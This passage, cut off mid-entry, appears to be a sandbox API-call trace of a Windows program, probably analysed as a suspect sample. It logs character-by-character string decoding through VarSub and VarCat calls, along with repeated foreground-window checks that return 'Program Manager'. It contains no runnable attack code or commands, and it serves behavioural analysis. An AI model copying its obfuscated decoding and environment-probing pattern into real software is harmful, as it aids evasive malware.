1 [0178.659] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.660] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.660] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.661] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.661] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.661] GetForegroundWindow () returned 0x20086 [0178.661] GetLastError () returned 0x0 [0178.662] SysStringLen (param_1=" ") returned 0xff [0178.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.662] SysStringLen (param_1=" ") returned 0xff [0178.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.662] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0178.662] GetLastError () returned 0x0 [0178.662] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.663] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0178.663] SysStringLen (param_1="Prog") returned 0x4 [0178.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Prog", cchWideChar=5, lpMultiByteStr=0x116859c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Prog", lpUsedDefaultChar=0x0) returned 5 [0178.663] SetWindowTextA (hWnd=0x103c4, lpString="Prog") returned 1 [0178.664] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0178.664] GetFocus () returned 0x0 [0178.664] lstrlenA (lpString="Prog") returned 4 [0178.664] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0178.664] IsWindow (hWnd=0x103c4) returned 1 [0178.665] IsWindow (hWnd=0x103c4) returned 1 [0178.665] IsWindow (hWnd=0x103c4) returned 1 [0178.665] IsWindow (hWnd=0x103c4) returned 1 [0178.665] GetFocus () returned 0x0 [0178.666] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0178.666] GetFocus () returned 0x0 [0178.666] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0178.666] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0178.666] GetFocus () returned 0x0 [0178.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0178.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=5 | out: lpWideCharStr="Prog") returned 5 [0178.667] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.667] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.674] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0178.674] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.675] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0178.675] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.675] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.676] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.676] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.676] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.678] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.678] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.678] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.679] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.679] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.679] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.680] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.680] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.681] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.681] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.682] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.682] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.687] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.687] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.688] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.688] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.689] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.689] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.689] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.690] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.690] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.691] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.691] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.691] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.692] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.692] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.693] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.693] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.694] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.694] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.695] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.695] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.695] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.696] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.696] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.696] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.697] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.697] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.698] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.716] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.716] GetForegroundWindow () returned 0x20086 [0178.716] GetLastError () returned 0x0 [0178.717] SysStringLen (param_1=" ") returned 0xff [0178.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.717] SysStringLen (param_1=" ") returned 0xff [0178.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.717] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0178.717] GetLastError () returned 0x0 [0178.717] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.717] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0178.718] SysStringLen (param_1="Prog") returned 0x4 [0178.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Prog", cchWideChar=5, lpMultiByteStr=0x11684fc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Prog", lpUsedDefaultChar=0x0) returned 5 [0178.718] SetWindowTextA (hWnd=0x103c4, lpString="Prog") returned 1 [0178.718] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0178.718] GetFocus () returned 0x0 [0178.719] lstrlenA (lpString="Prog") returned 4 [0178.719] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0178.719] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=5 | out: lpString="Prog") returned 4 [0178.719] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0178.719] GetFocus () returned 0x0 [0178.719] lstrcmpA (lpString1="Prog", lpString2="Prog") returned 0 [0178.719] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.719] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0178.720] GetFocus () returned 0x0 [0178.720] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0178.720] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0178.720] GetFocus () returned 0x0 [0178.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0178.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=5 | out: lpWideCharStr="Prog") returned 5 [0178.720] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.720] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.721] WideCharToMultiByte (in: CodePage=0x0, 